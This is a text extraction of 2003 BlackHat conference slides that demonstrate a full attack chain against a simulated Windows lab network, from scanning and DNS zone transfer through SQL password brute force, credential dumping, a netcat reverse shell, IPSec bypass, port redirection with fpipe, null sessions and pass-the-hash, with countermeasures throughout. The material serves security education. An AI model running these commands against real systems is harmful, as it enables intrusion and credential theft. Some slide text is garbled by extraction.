Post on 09-Jan-2022
1
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Securing Your Network
The Art of Attack & Penetration
Erik Pace Birkholz – Special Ops SecurityEric Schultze – Shavlik Technologies
Session Objectivesn Discuss common DMZ and host
configuration weaknessesn Demonstrate common hacker
techniques that exploit these weaknesses
n Present countermeasures to help secure the network and related hosts
2
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Hacker’s Objective
Identify and Penetrate Access Points to Corporate Network
SysAdmin’s Objective
Identify Holes in the Environment and
Close Them
3
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Methodologyn Footprinting
n Obtaining Public Information About the Targetn Google searchesn www.netsol.com - whois
n Locating and Identifying IP rangesn www.arin.net - whois
n Profiling the Targetn Mail Servers, DNS Servers, Web Servers
n Exploiting the Visible Targetsn Leveraging Victims to exploit other
machines|networks
Backgroundn For the purposes of this
demonstration,n Our attack machines will be using the
10.1.1.0 networkn The 10.1.1.0 network is simulating the
Internet cloud
n The Target network is 172.16.1.0n The Target company is Black.Hat
n There “may” be other networks……
4
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Network Diagram
ERIC
ERIK
Laying the Groundwork
n The first step of the attack is to determine systems that may be alive and ‘listening’
n ICMP Queries (Ping Sweeps) are a simple (yet ‘loud’) mechanism to identify machines that are alive
5
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
SuperScan - Ping Sweep
Fscan.exe (ping and port scanner)
FScan v1.14 - Command line port scanner.Copyright 2002 (c) by Foundstone, Inc.http://www.foundstone.comFScan [-abefhqnrsv?] [-cditz <n>] [-flo <file>] [-pu <n>[,<n>-<n>]] IP[,IP-IP]
-a - Append to output file (used in conjunction with -o option)-b - Get port banners-c - Timeout for connection attempts (ms). Default is 2000-d - Delay between scans (ms). Default is 0-e - Resolve IP addresses to hostnames-f - Read IPs from file (compatible with output from -o)-i - Bind to given local port-l - Port list file - enclose name in quotes if it contains spaces-m - Bind to given local interface IP-n - No port scanning - only pinging (unless you use -q)-o - Output file - enclose name in quotes if it contains spaces-p - TCP port(s) to scan (a comma separated list of ports/ranges)-P - Use built-in list of TCP ports-q - Quiet mode, do not ping host before scan-r - Randomize port order-s - Show RST TCP connections-t - Timeout for pings (ms). Default is 2000-u - UDP port(s) to scan (a comma separated list of ports/ranges)-U - Use built-in list of UDP ports-v - Verbose mode-z - Number of threads to use for scanning. Default is 64
6
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Fscan Ping Sweep (-n option)
n Fscan –n 172.16.1.1-254C:C:\\>fscan>fscan--v1.12.exe v1.12.exe --n 172.16.1.1n 172.16.1.1--254254FScan v1.12 FScan v1.12 -- Command line port scanner.Command line port scanner.Copyright 2000 (c) by Foundstone, Inc.Copyright 2000 (c) by Foundstone, Inc.http://http://www.foundstone.comwww.foundstone.com
Scan started at Mon Jul 22 14:59:35 2002Scan started at Mon Jul 22 14:59:35 2002
172.16.1.38172.16.1.38172.16.1.200172.16.1.200
Scan finished at Mon Jul 22 14:59:37 2002Scan finished at Mon Jul 22 14:59:37 2002Time taken: 254 Time taken: 254 IPsIPs in 1.853 in 1.853 secssecs (137.08 (137.08 IPsIPs/sec)/sec)
C:C:\\>>
Port Scanningn Port Scanning:
n Equivalent to knocking on all the doors and windows of a house
n Port scanning software sequentially or randomly connects to every (specified) TCP/UDP port on a target system (up to 64K ports)n Allows you to determine what services are
running on the target systemn If vulnerable or inherently insecure services are
running, you may be able to exploit them and gain access to the target system
7
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
“Target Ports”
n Hackers look for victim hosts with easily exploitable servicesn Web (tcp 80 & tcp 443)n *NetBIOS (tcp 139)n *Direct Host (tcp 445)n *SQL server (tcp 1433, udp 1434)n Terminal Services (tcp 3389)
* Presence of these ports may indicate a network that is not well-secure, and this ready for “takeover”
Port Scanning – Super Scan
8
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Port Scanning - Fscan.exeC:\>fscan 172.16.1.1-254FScan v1.14 - Command line port scanner.Copyright 2002 (c) by Foundstone, Inc.http://www.foundstone.com
No port list file found - using built-in TCP list:
10,11,15,21,22,23,25,42,43,53,66,70,79,80,81,88,109,111,113,115,118,119,135,139,143,150,156,256,259,389,396,427,443,445,465,512,513,514,515,524,593,799,900,1024,1080,1214,1243,1313,1352,1433,1494,1498,1521,1524,1541,1542,1723,2000,2001,2003,2049,2140,2301,2447,2766,2998,3268,3300,3306,3389,4045,4321,5556,5631,5632,5800,5801,5802,6000,6112,6667,7000,7001,7002,7070,7947,8000,8001,8010,8080,8100,8800-8900,9090,10000,12345,20034,30821,32700-32900
Scan started at Mon Jul 22 15:24:35 2002
172.16.1.38 80/tcp172.16.1.200 53/tcp
Scan finished at Mon Jul 22 15:26:42 2002Time taken: 796 ports in 126.642 secs (6.29 ports/sec)
C:\>
Examine available ports
172.16.1.38 80/tcpn Secure web server. No dice.
9
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Examine available ports
172.16.1.200 53/tcpn Attempt DNS zone transfer using the
company name:
Black.Hat
DNS Zone Transfers (TCP 53)
n Method by which primary and secondary name servers stay synchronized
n Common mis-configurations may allow other machines (and hackers) to obtain zone information
10
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
DNS Zone Transfer - nslookupCommand
C:\>nslookup> Server ipaddress> Set type=any> Ls –d target.com
DNS Zone Transfer - nslookup
> ls -d black.hat[[172.16.1.200]]black.hat. SOA win2kinspi8.black.hat admin.black.hat. (232 900 600 86400 3600)black.hat. A 172.16.1.200black.hat. A 192.168.1.200black.hat. NS win2kinspi8.black.hat black.hat. NS dmzsql.black.hat_kerberos._tcp.default-first-site-name._sites.dc._msdcs SRV priority=0, weight=100, port=88,
win2kinspi8.black.hat_ldap._tcp.default-first-site-name._sites.dc._msdcs SRV priority=0, weight=100, port=389,
win2kinspi8.black.hat_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, win2kinspi8.black.hat_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, win2kinspi8.black.hat_ldap._tcp.065c2cf9-f899-425e-afc2-998c6da4a992.domains._msdcs SRV priority=0, weight=100, port=389,
win2kinspi8.black.hate118ba3a-e65f-4a18-83bc-88c2bfc8e09e._msdcs CNAME win2kinspi8.black.hatgc._msdcs A 172.16.1.200gc._msdcs A 192.168.1.200_ldap._tcp.default-first-site-name._sites.gc._msdcs SRV priority=0, weight=100, port=3268,
win2kinspi8.black.hat_ldap._tcp.gc._msdcs SRV priority=0, weight=100, port=3268, win2kinspi8.black.hat_ldap._tcp.pdc._msdcs SRV priority=0, weight=100, port=389, win2kinspi8.black.hat_gc._tcp.default-first-site-name._sites SRV priority=0, weight=100, port=3268, win2kinspi8.black.hat_kerberos._tcp.default-first-site-name._sites SRV priority=0, weight=100, port=88, win2kinspi8.black.hat_ldap._tcp.default-first-site-name._sites SRV priority=0, weight=100, port=389, win2kinspi8.black.hat_gc._tcp SRV priority=0, weight=100, port=3268, win2kinspi8.black.hat_kerberos._tcp SRV priority=0, weight=100, port=88, win2kinspi8.black.hat_kpasswd._tcp SRV priority=0, weight=100, port=464, win2kinspi8.black.hat_ldap._tcp SRV priority=0, weight=100, port=389, win2kinspi8.black.hat_kerberos._udp SRV priority=0, weight=100, port=88, win2kinspi8.black.hat_kpasswd._udp SRV priority=0, weight=100, port=464, win2kinspi8.black.hatDMZsql A 172.16.1.38win2kinspi8 A 192.168.1.200win2kinspi8 A 172.16.1.200black.hat. SOA win2kinspi8.black.hat admin.black.hat
11
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Scanning UDP Portsn Scanning TCP ports only tells half the
storyn Using FScan, we can identify open UDP
portsC:\>fscan -u 1434 172.16.1.38FScan v1.14 - Command line port scanner.Copyright 2002 (c) by Foundstone, Inc.http://www.foundstone.com
Scan started at Mon Jul 22 19:49:59 2002
172.16.1.38 1434/udp
Scan finished at Mon Jul 22 19:50:01 2002Time taken: 1 ports in 2.013 secs (0.50 ports/sec)
n UDP 1434 acts as a “port mapper” for Microsoft SQL Server
Locating SQL Servern Multiple Instances of SQL Server can be
installed and may be running on custom ports
n Tool: SqlPing2 by Chip Andrewsn www.sqlsecurity.com
n Purpose: Locate SQL servers running on TCP ports other than 1433
n How: uses UDP to query 1434 on each hostn UDP 1434 returns information on SQL instances,
listening SQL TCP ports, named pipes, etc
12
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Using SQLPing2 for SQL Recon
named instance
What We Know
n Two hosts are responding to icmpn Web Server (running SQL on alternate port)n Domain Controller
n Router is probably blocking all ports below 1024n With the exception of specific service ports
(80, 53)n TCP ports 139, 445, 3389 are probably blocked
at the router
n Router may allow most ports above 1024
13
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Our Network Diagram
INTERNET DMZ
NT #210.1.1.38
NT #1 10.1.1.10
Router10.1.1.1
172.16.1.1
172.16.1.38WWW
Domain Controller172.16.1.200
Firewall172.16.1.252
unknown
Realistic Route Map
11.0 3h
17.0 66h
18.0 11h
10.68.145.5810.68.145.59
172.16.1.105
172.16.34.4172.16.34.132
19.0 33h
172.16.2.34
172.16.3.1172.16.11.1172.16.18.1172.16.19.1172.16.19.2
10.68.129.3010.68.145.34
172.16.2.35
172.16.17.1172.16.17.21
172.16.2.185 172.16.2.99
1.0 75h2.0 50h7.0 50h
172.16.32.1 172.16.32.2
172.16.34.10
172.16.32.68
172.16.36.2
172.16.36.1
172.16.34.6172.16.34.7
172.16.34.134172.16.34.135
172.16.38.1
38.0 10h
172.16.39.1
172.16.34.8172.16.34.9
172.16.34.136172.16.34.137
39.0 7h
172.16.39.65
172.16.39.66
172.16.243.100172.16.33.5,13,
17,21,29
243.0 3h
172.16.33.30
172.16.33.28172.16.33.31
74.Xx=2-63
172.16.34.3172.16.34.131
172.16.33.6172.16.33.14
64.069.0
70.071.0
65.0?66.0?68.0?
172.16.34.5172.16.34.133
192.168.232-235.0
95h
3.0 32h
172.16.32.3-10172.16.34.X
X=1,2,127,128,129,130
Internet
acme.ohio.telco.net
Routers10.68.145.1
34
343942
10.68.128-10.0
Access Paths
14
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
What Could We Do Next?
n Attack 172.16.1.200n DNS (already done – Zone Transfer)
n Attack 172.16.1.38n Web Server (patched)n SQL Server (running on tcp 38038)
Leveraging SQL Server
n SQLPing2 can also be used to brute force SQL Server account names and passwords
n www.sqlsecurity.com
15
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
SQLPing 2
Leveraging SQL Servern We now have the SA passwordn How can we use this information to
further our attacks?n We need to “become interactive” on the
SQL victim, then “pillage” the system for data we can use to further our attack.
n COUNTERMEASUREn Use Windows Authentication Mode
n Formerly Integrated Authentication Mode
n DO NOT use Mixed Mode
16
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Leveraging SQL Server
n Connect to SQL server using Query Analyzern Use extended stored procedures to run
commands as LocalSystemn xp_cmdshell can be used to execute tftp to
upload hacker warez to the SQL server.n If router is not blocking outbound tftp
n If tftp (udp 69) is blocked, we can try ftp, http, NetBIOS, etc.
Steps to Take After System is Compromised
n Pwdump3 is used to obtain password hashes from local system
n LSADump2 is used to query the Local Security Authority and dump service account passwords.
n Use sc.exe with the “qc” option to identify what user account the service is running as (i.e. sc qc TlntSvr)
n Netcat may be used to pipe the results to the hacker’s system
17
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Cracking Passwords
n L0phtCrack
Cracking Passwordsn COUNTERMEASURE
n Choose strong passwordsn 15 characters or longer
n Does not store LanMAN hash
n Under 15, use 7 or 14 characters exactly and use special symbols in the password
n Enable NoLMHash registry key n Available on Windows 2000, Windows XP and
Windows 2003 Server
18
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
LSA Secrets Cachen Passwords for services running under the
context of a user account are stored in ‘almost cleartext’ in the Registry
n These passwords can be recovered using lsadump2 (http://razor.bindview.com)
n Use sc.exe with the “qc” option to identify what user account the service is running as (i.e. sc qc TlntSvr)
n Attacker must have “local” admin access to the server
LSA Secrets Cache
n COUNTERMEASUREn Don’t run services under the context of a
highly privileged accountn Particularly one with domain level credentials
19
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Attacking from the Insiden Let’s use NETCAT (nc.exe) to send us a
command prompt from the victim system.n Create a netcat listener on your machine
on port 9999n Instruct Netcat to “shovel you shell” to
this listening portn Passes cmd.exe to netcat listener
Passing Local Tool Output via Netcat
INTERNET DMZ
NT #210.1.1.38
NT #1 10.1.1.10
Router10.1.1.1
172.16.1.1
172.16.1.38WWW
Domain Controller172.16.1.200
Firewall172.16.1.252
unknownTCP 38038
TCP 9999
20
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Cmd.Exe - Behind the Router
n Now that we’re behind the router we can execute commands against the internal networkn First, we’ll port scan DMZ machines without
interference from the router filtering rulesn FScan works well from the command-line
n fscan -u 161 172.16.1.200Results: 161/udp (snmp)
n fscan 172.16.1.200Results: 88/tcp (kerberos)
Network Diagram
INTERNET DMZ
NT #210.1.1.38
NT #1 10.1.1.10
Router10.1.1.1
172.16.1.1
172.16.1.38WWW
Domain Controller172.16.1.200
Firewall172.16.1.252
unknown
fscan
21
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
SNMPn Default listener on UDP 161 (if SNMP
installed)n Default community string is ‘public’n May be used to enumerate users, NICs,
services, etc.n Snmputil.exen Snmpwalkn Solarwinds IP browser - www.solarwinds.net
n COUNTERMEASUREn Disable SNMP if not neededn Change default community string
Snmputil.exe
snmputil walk 172.16.1.200 public .1.3.6.1.4.1.77.1.2.25
OID for usernames: .1.3.6.1.4.1.77.1.2.25
All usernames on system will be displayed if SNMP is running with community name of “public”
n Other OIDs with give services, shares, connections, etc…
22
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
IPSec
n We’ve only identified tcp 88 on the Domain Controllern IPSec Port Blocking is enabled on
this machinen Luckily, IPSec Port Blocking can be
bypassed using source port routing!
Bypassing IPSecn IPSec ‘block all’ policy may not block all
n KB Article: Q253169 - Default Exemptions: (5 of them)n Broadcast, Multicast, Resource Reservation Protocol (RSVP),
Internet Key Exchange (IKE), Kerberos.n Kerberos uses UDP/TCP protocols with source AND
destination of 88.n RULE: If a packet is TCP or UDP and has a src or dst of 88,
then PERMITn RESULTS: full access to blocked ports
n COUNTERMEASURE n HKLM\SYSTEM\CCS\Services\IPSEC\NoDefaultExempt
n DWORD=1 (This removes Kerberos & RSVP)
23
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Bypassing IPSecn FScan –i 88
(scan using source port 88) n shows the Domain Controller is running
Terminal Services (tcp 3389)
n The router is blocking access to tcp 3389
n How do we connect via TS to this system?
Bypassing Router Filtering
n We would like to connect tcp 3389 on the Domain Controller
n The Router is blocking access to tcp3389n Since we have a foothold on the Web/SQL
boxn We will leverage this position to do port
redirection
24
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Port Redirection
n Fpipe.exe (www.foundstone.com) listens on one port and forwards all traffic received to a specified port on a remote machine
n While packets are being redirected, the source port of the packets may be manipulated
Network Diagram
INTERNET DMZ
NT #210.1.1.38
NT #1 10.1.1.10
Router10.1.1.1
172.16.1.1
172.16.1.38WWW
Domain Controller172.16.1.200
Firewall172.16.1.252
unknown
NT #1.510.1.1.11
TO 3389TO 5000
TO 3389from source
port 88
25
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Port Redirection (FPipe)
n Attacker’s ‘NT #1.5’ host listens on 3389 and redirects to 5000 on Web/SQL boxn fpipe -i 10.1.1.11 -l 3389 -r 5000 172.16.1.38
n Web/SQL listens on 5000 and redirects to 3389 on Domain Controller (using Source Port 88)n fpipe -l 5000 -r 3389 -s 88 172.16.1.200
n Attacker’s ‘NT #1’ host initiates TS session to ‘NT #1.5’ host
n TS request is forwarded over Router to Web/SQL box and on to the Domain Controller
Network Diagram
INTERNET DMZ
NT #210.1.1.38
NT #1 10.1.1.10
Router10.1.1.1
172.16.1.1
172.16.1.38WWW
Domain Controller172.16.1.200
Firewall172.16.1.252
unknown
NT #1.510.1.1.11
TO 3389TO 5000
TO 3389source port 88
26
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Terminal Services
n Via the SNMP and LSADump2 resultsn We know that the Backup account is
present on the Terminal Servern The Backup account is probably an
administrator level accountn And we have the clear-text password for
this account
n Once on the TS box, additional tools are uploaded using tftp to the hacker’s machine
HackNT
n Several Steps to Enumerating NT Informationn Now that we have access to a system
on the internal network, we may begin to enumerate other Microsoft machines and networks
27
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Information Gathering
Identify domains on the wireCOMMAND
net view /domain
Identify machines in the domainCOMMAND
net view /domain:domain_name
Information GatheringExamine target server for additional IP
addresses
COMMANDepdump 192.168.1.220
COUNTERMEASUREBlock access to tcp 135
28
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Information Gathering
Establish null session connection
COMMANDnet use \\192.168.1.220\ipc$ “” /user:””
Information Gathering
key commandsnull session connection
net use \\192.168.1.220\ipc$ “” /user:””
may also be referred to as the “anonymous user”
insert spaces here
29
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Information GatheringObtain usernames for members of the
Administrators group
COMMANDlocal administrators \\192.168.1.220
COUNTERMEASURERestrictAnonymous Registry Key
(settings vary for OS, read KB on RA reg key)
Passing Hash
n Password hashes are password equivalents
n So… why can’t we simply use the hash as the password?!
n Password hash of target account must be loaded into memory on our own attack machine
n We ‘become’ the target account
30
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Passing Hash
n Hash passing tool only works from an NT4 system
n We’ll need to setup new redirectors so 10.1.1.11 (NT4) can access tcp 139 on the 192.168.1.220 machinen This time, we’ll use rinetd.exe
(www.boutell.com) as the port redirector
Network Diagram
INTERNET DMZ CORPORATE NET
NT #210.1.1.38
NT #1.5 10.1.1.11
172.16.1.38WWW
Domain Controller172.16.1.200
Staging Server 192.168.1.220
PayrollPC192.168.2.100
Firewall172.16.1.252
unknown
Router10.1.1.1
172.16.1.1
NT #1.610.1.1.12
TO 139
TO 2139
TO 2139
To 139
31
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Passing Hash
Grab a Remote Shell
n Use remote.exe from NT Resource Kit to launch a remote shelln Remote.exe can be used over named
pipes (not just TCP/IP)n We’ve created a script to copy
remote.exe to the remote system, install it as a service, and fire us back a shell
n Remoteprompt \\10.1.1.12 scsi
32
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Network Diagram
INTERNET DMZ CORPORATE NET
NT #1.5 10.1.1.11
172.16.1.38WWW
Domain Controller172.16.1.200
Staging Server 192.168.1.220
PayrollPC192.168.2.100
Firewall172.16.1.252
unknown
Router10.1.1.1
172.16.1.1
NT #1.6 10.1.1.12
TO 139
TO 2139
TO 2139
To 139
NT #210.1.1.38
Grab a Remote Shell n We now have remote shell access to a
server on the internal corporate network
n We’ve bypassed n Router filtering rulesn IPSec Rules
Using insecure an SQL machine, a dual-homed machine, LSA secrets, and matching passwords across domains
33
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Network Diagram
INTERNET DMZ CORPORATE NET
NT #210.1.1.38
NT #1.5 10.1.1.11
172.16.1.38WWW
Domain Controller172.16.1.200
Staging Server 192.168.1.220
PayrollPC192.168.2.100
Firewall172.16.1.252
unknown
Router10.1.1.1
172.16.1.1
NT #1.6 10.1.1.12
ASP.DLL Buffer Overflow
n Fixed in MS02-018n Can be used to obtain complete
access to an unpatched IIS web server
n Remote shell is piped back to attacker’s machine
34
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Addressing the Threatsn Identify the vulnerabilities
n Apply fixes and patches immediately
n Log and monitor all systems
n Implement User Awareness programs
n Design and implement widely accepted policies and standards
Network Countermeasuresn First, block ALL ports at the border
routers, in BOTH directionsn Then, open only those ports that
support your security policyn Review Logsn Implement Network and Host Intrusion
Detectionn Evaluate need for dual-homed hosts
35
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Ongoing Effortsn Stay Informed
n Bugtraq, NTBugtraq and Focus-MS mailing listsn www.securityfocus.comn www.ntbugtraq.com
n www.microsoft.com/securityn Security advisoriesn Patchesn Best Practices
n Provide Trainingn Perform independent security assessments
Countermeasures
Disclaimer:Test all changes on a non-production host before implementing on production servers
36
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
www.syngress.com/ops
Erik Pace Birkholz, CISSP, MCSEErik Pace Birkholz, CISSP, MCSE
erik@specialopssecurity.orgerik@specialopssecurity.org
Special Ops:Host and Network Security for Microsoft, UNIX and Oracle
Contact Informationn Erik Pace Birkholz
n erik@foundstone.com
n Eric Schultzen eric@shavlik.com
n Web Sitesn www.shavlik.comn www.foundstone.com
37
BlackHat Windows Security 2003
Copyright 2003 Eric Schultze, Shavlik Technologies
Securing Your Network: The Art of Attack and Penetration
Network Diagram
INTERNET DMZ CORPORATE NET
NT #210.1.1.38
NT #1 10.1.1.10
172.16.1.38WWW
Domain Controller172.16.1.200
Staging Server 192.168.1.220
PayrollPC192.168.2.100
Firewall172.16.1.252
unknown
Router10.1.1.1
172.16.1.1
NT #1.5 10.1.1.11